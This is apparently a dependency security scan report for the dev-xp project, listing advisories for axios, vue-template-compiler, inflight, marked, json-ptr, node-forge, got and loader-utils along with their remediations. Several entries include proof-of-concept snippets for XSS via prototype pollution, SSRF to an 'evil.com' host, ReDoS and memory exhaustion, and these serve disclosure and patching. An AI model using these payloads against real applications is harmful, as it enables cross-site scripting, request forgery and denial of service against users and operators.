vue-template-compiler is a template compiler for Vue 2.0
Affected versions of this package are vulnerable to Cross-site Scripting (XSS) through the manipulation of object properties such as Object.prototype.staticClass
or Object.prototype.staticStyle
. An attacker can execute arbitrary JavaScript code by altering the prototype chain of these properties.
Note: This vulnerability is not present in Vue 3.
PoC
<head>
<script>
window.Proxy = undefined // Not necessary, but helpfull in demonstrating breaking out into `window.alert`
Object.prototype.staticClass = `alert("Polluted")`
</script>
<script src="https://cdn.jsdelivr.net/npm/vue@2.7.16/dist/vue.js"></script>
</head>
<body>
<div id="app"></div>
<script>
new window.Vue({
template: `<div class="">Content</div>`,
}).$mount('#app')
</script>
</body>
Details
A cross-site scripting attack occurs when the attacker tricks a legitimate web-based application or site to accept a request as originating from a trusted source.
This is done by escaping the context of the web application; the web application then delivers that data to its users along with other trusted dynamic content, without validating it. The browser unknowingly executes malicious script on the client side (through client-side languages; usually JavaScript or HTML) in order to perform actions that are otherwise typically blocked by the browser’s Same Origin Policy.
Injecting malicious code is the most prevalent manner by which XSS is exploited; for this reason, escaping characters in order to prevent this manipulation is the top method for securing code against this vulnerability.
Escaping means that the application is coded to mark key characters, and particularly key characters included in user input, to prevent those characters from being interpreted in a dangerous context. For example, in HTML, <
can be coded as <
; and >
can be coded as >
; in order to be interpreted and displayed as themselves in text, while within the code itself, they are used for HTML tags. If malicious content is injected into an application that escapes special characters and that malicious content uses <
and >
as HTML tags, those characters are nonetheless not interpreted as HTML tags by the browser if they’ve been correctly escaped in the application code and in this way the attempted attack is diverted.
The most prominent use of XSS is to steal cookies (source: OWASP HttpOnly) and hijack user sessions, but XSS exploits have been used to expose sensitive information, enable access to privileged services and functionality and deliver malware.
Types of attacks
There are a few methods by which XSS can be manipulated:
Type | Origin | Description |
---|---|---|
Stored | Server | The malicious code is inserted in the application (usually as a link) by the attacker. The code is activated every time a user clicks the link. |
Reflected | Server | The attacker delivers a malicious link externally from the vulnerable web site application to a user. When clicked, malicious code is sent to the vulnerable web site, which reflects the attack back to the user’s browser. |
DOM-based | Client | The attacker forces the user’s browser to render a malicious page. The data in the page itself delivers the cross-site scripting data. |
Mutated | The attacker injects code that appears safe, but is then rewritten and modified by the browser, while parsing the markup. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters. |
Affected environments
The following environments are susceptible to an XSS attack:
- Web servers
- Application servers
- Web application environments
How to prevent
This section describes the top best practices designed to specifically protect your code:
- Sanitize data input in an HTTP request before reflecting it back, ensuring all data is validated, filtered or escaped before echoing anything back to the user, such as the values of query parameters during searches.
- Convert special characters such as
?
,&
,/
,<
,>
and spaces to their respective HTML or URL encoded equivalents. - Give users the option to disable client-side scripts.
- Redirect invalid requests.
- Detect simultaneous logins, including those from two separate IP addresses, and invalidate those sessions.
- Use and enforce a Content Security Policy (source: Wikipedia) to disable any features that might be manipulated for an XSS attack.
- Read the documentation for any of the libraries referenced in your code to understand which elements allow for embedded HTML.
Remediation
A fix was pushed into the master
branch but not yet published.
References
medium severity
- Vulnerable module: axios
- Introduced through: axios@0.21.4
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › axios@0.21.4Remediation: Upgrade to axios@0.30.0.
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to the allowAbsoluteUrls
attribute being ignored in the call to the buildFullPath
function from the HTTP adapter. An attacker could launch SSRF attacks or exfiltrate sensitive data by tricking applications into sending requests to malicious endpoints.
PoC
const axios = require('axios');
const client = axios.create({baseURL: 'http://example.com/', allowAbsoluteUrls: false});
client.get('http://evil.com');
Remediation
Upgrade axios
to version 0.30.0, 1.8.2 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: axios@0.21.4
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › axios@0.21.4Remediation: Upgrade to axios@0.30.0.
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to not setting allowAbsoluteUrls
to false
by default when processing a requested URL in buildFullPath()
. It may not be obvious that this value is being used with the less safe default, and URLs that are expected to be blocked may be accepted. This is a bypass of the fix for the vulnerability described in CVE-2025-27152.
Remediation
Upgrade axios
to version 0.30.0, 1.8.3 or higher.
References
medium severity
- Vulnerable module: inflight
- Introduced through: glob@7.2.3, firebase-tools@9.23.3 and others
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › exegesis@2.5.7 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › node-gyp@7.1.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › sass-graph@2.2.5 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › true-case-path@1.0.3 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › archiver@5.3.2 › archiver-utils@2.1.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › exegesis-express@2.0.1 › exegesis@2.5.7 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › node-gyp@7.1.2 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-wick@4.0.3 › node-pre-gyp@0.12.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › wick-downloader@0.3.4 › node-pre-gyp@0.14.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › cacache@15.3.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › npm-packlist@2.2.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › node-sass@5.0.0 › gaze@1.1.3 › globule@1.3.4 › glob@7.1.7 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › archiver@5.3.2 › zip-stream@4.1.1 › archiver-utils@3.0.4 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › cacache@15.3.0 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › unzipper@0.10.14 › fstream@1.0.12 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › @npmcli/run-script@1.8.6 › node-gyp@7.1.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › restify@8.6.1 › bunyan@1.8.15 › mv@2.1.1 › rimraf@2.4.5 › glob@6.0.4 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › @npmcli/run-script@1.8.6 › node-gyp@7.1.2 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › cacache@15.3.0 › @npmcli/move-file@1.1.2 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › npm-registry-fetch@11.0.0 › make-fetch-happen@9.1.0 › cacache@15.3.0 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › npm-registry-fetch@11.0.0 › make-fetch-happen@9.1.0 › cacache@15.3.0 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-filesize@9.1.2 › pacote@11.3.5 › npm-registry-fetch@11.0.0 › make-fetch-happen@9.1.0 › cacache@15.3.0 › @npmcli/move-file@1.1.2 › rimraf@3.0.2 › glob@7.2.3 › inflight@1.0.6
…and 24 more
Overview
Affected versions of this package are vulnerable to Missing Release of Resource after Effective Lifetime via the makeres
function due to improperly deleting keys from the reqs
object after execution of callbacks. This behavior causes the keys to remain in the reqs
object, which leads to resource exhaustion.
Exploiting this vulnerability results in crashing the node
process or in the application crash.
Note: This library is not maintained, and currently, there is no fix for this issue. To overcome this vulnerability, several dependent packages have eliminated the use of this library.
To trigger the memory leak, an attacker would need to have the ability to execute or influence the asynchronous operations that use the inflight module within the application. This typically requires access to the internal workings of the server or application, which is not commonly exposed to remote users. Therefore, “Attack vector” is marked as “Local”.
PoC
const inflight = require('inflight');
function testInflight() {
let i = 0;
function scheduleNext() {
let key = `key-${i++}`;
const callback = () => {
};
for (let j = 0; j < 1000000; j++) {
inflight(key, callback);
}
setImmediate(scheduleNext);
}
if (i % 100 === 0) {
console.log(process.memoryUsage());
}
scheduleNext();
}
testInflight();
Remediation
There is no fixed version for inflight
.
References
medium severity
- Vulnerable module: marked
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › marked@0.7.0Remediation: Upgrade to firebase-tools@10.1.2.
Overview
marked is a low-level compiler for parsing markdown without caching or blocking for long periods of time.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The em
regex within src/rules.js
file have multiple unused capture groups which could lead to a denial of service attack if user input is reachable.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade marked
to version 1.1.1 or higher.
References
medium severity
- Vulnerable module: json-ptr
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › exegesis@2.5.7 › json-ptr@2.2.0Remediation: Upgrade to firebase-tools@10.1.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › exegesis-express@2.0.1 › exegesis@2.5.7 › json-ptr@2.2.0Remediation: Upgrade to firebase-tools@10.1.0.
Overview
json-ptr is a complete implementation of JSON Pointer (RFC 6901) for nodejs and modern browsers.
Affected versions of this package are vulnerable to Prototype Pollution. A type confusion vulnerability can lead to a bypass of CVE-2020-7766 when the user-provided keys used in the pointer
parameter are arrays.
PoC
const { JsonPointer } = require("json-ptr");
// JsonPointer.set({}, ['__proto__', 'polluted'], 'yes', true);
// console.log(polluted); // Error: Attempted prototype pollution disallowed.
JsonPointer.set({}, [['__proto__'], 'polluted'], 'yes', true);
console.log(polluted); // yes
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__
, constructor
and prototype
. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype
are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Object
recursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__
defined with Object.defineProperty()
, the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object
and the source of Object
as defined by the attacker. Properties are then copied on the Object
prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source)
.
lodash
and Hoek
are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue
. myValue
is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
Type | Origin | Short description |
---|---|---|
Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf ). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object . In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr) . In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin , then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true , they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype)
.Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)
), breaking the prototype chain and preventing pollution.As a best practice use
Map
instead ofObject
.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade json-ptr
to version 3.0.0 or higher.
References
medium severity
- Vulnerable module: node-forge
- Introduced through: firebase-admin@9.12.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › node-forge@0.10.0Remediation: Upgrade to firebase-admin@10.0.2.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to RSA's PKCS#1 v1.5
signature verification code which does not properly check DigestInfo
for a proper ASN.1
structure. This can lead to successful verification with signatures that contain invalid structures but a valid digest.
Remediation
Upgrade node-forge
to version 1.3.0 or higher.
References
medium severity
- Vulnerable module: node-forge
- Introduced through: firebase-admin@9.12.0
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-admin@9.12.0 › node-forge@0.10.0Remediation: Upgrade to firebase-admin@10.0.2.
Overview
node-forge is a JavaScript implementations of network transports, cryptography, ciphers, PKI, message digests, and various utilities.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature due to RSAs
PKCS#1` v1.5 signature verification code which is lenient in checking the digest algorithm structure. This can allow a crafted structure that steals padding bytes and uses unchecked portion of the PKCS#1 encoded message to forge a signature when a low public exponent is being used.
Remediation
Upgrade node-forge
to version 1.3.0 or higher.
References
medium severity
- Vulnerable module: got
- Introduced through: firebase-tools@9.23.3
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › update-notifier@5.1.0 › latest-version@5.1.0 › package-json@6.5.0 › got@9.6.0Remediation: Upgrade to firebase-tools@11.21.0.
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › firebase-tools@9.23.3 › superstatic@7.1.0 › update-notifier@4.1.3 › latest-version@5.1.0 › package-json@6.5.0 › got@9.6.0Remediation: Upgrade to firebase-tools@11.14.0.
Overview
Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs. It allowed a victim to be redirected to a UNIX socket.
Remediation
Upgrade got
to version 11.8.5, 12.1.0 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: axios@0.21.4
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › axios@0.21.4Remediation: Upgrade to axios@0.29.0.
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker can deplete system resources by providing a manipulated string as input to the format method, causing the regular expression to exhibit a time complexity of O(n^2)
. This makes the server to become unable to provide normal service due to the excessive cost and time wasted in processing vulnerable regular expressions.
PoC
const axios = require('axios');
console.time('t1');
axios.defaults.baseURL = '/'.repeat(10000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t1');
console.time('t2');
axios.defaults.baseURL = '/'.repeat(100000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t2');
/* stdout
t1: 60.826ms
t2: 5.826s
*/
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade axios
to version 0.29.0, 1.6.3 or higher.
References
medium severity
- Vulnerable module: loader-utils
- Introduced through: rollup-plugin-vue@4.7.2
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › generic-names@1.0.3 › loader-utils@0.2.17
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the resourcePath
variable in interpolateName.js
.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
String | Number of C's | Number of steps |
---|---|---|
ACCCX | 3 | 38 |
ACCCCX | 4 | 71 |
ACCCCCX | 5 | 136 |
ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade loader-utils
to version 1.4.2, 2.0.4, 3.2.1 or higher.
References
medium severity
- Vulnerable module: loader-utils
- Introduced through: rollup-plugin-vue@4.7.2
Detailed paths
-
Introduced through: dev-xp@RayBenefield/dev-xp#c233c87daf6232fa74b867a79210b217bae2cc32 › rollup-plugin-vue@4.7.2 › @vue/component-compiler@3.6.0 › postcss-modules-sync@1.0.0 › generic-names@1.0.3 › loader-utils@0.2.17
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in interpolateName
function via the URL
variable.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
A
The string must start with the letter 'A'(B|C+)+
The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+
matches one or more times). The+
at the end of this section states that we can look for one or more matches of this section.D
Finally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD
, ABCCCCD
, ABCBCCCD
and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
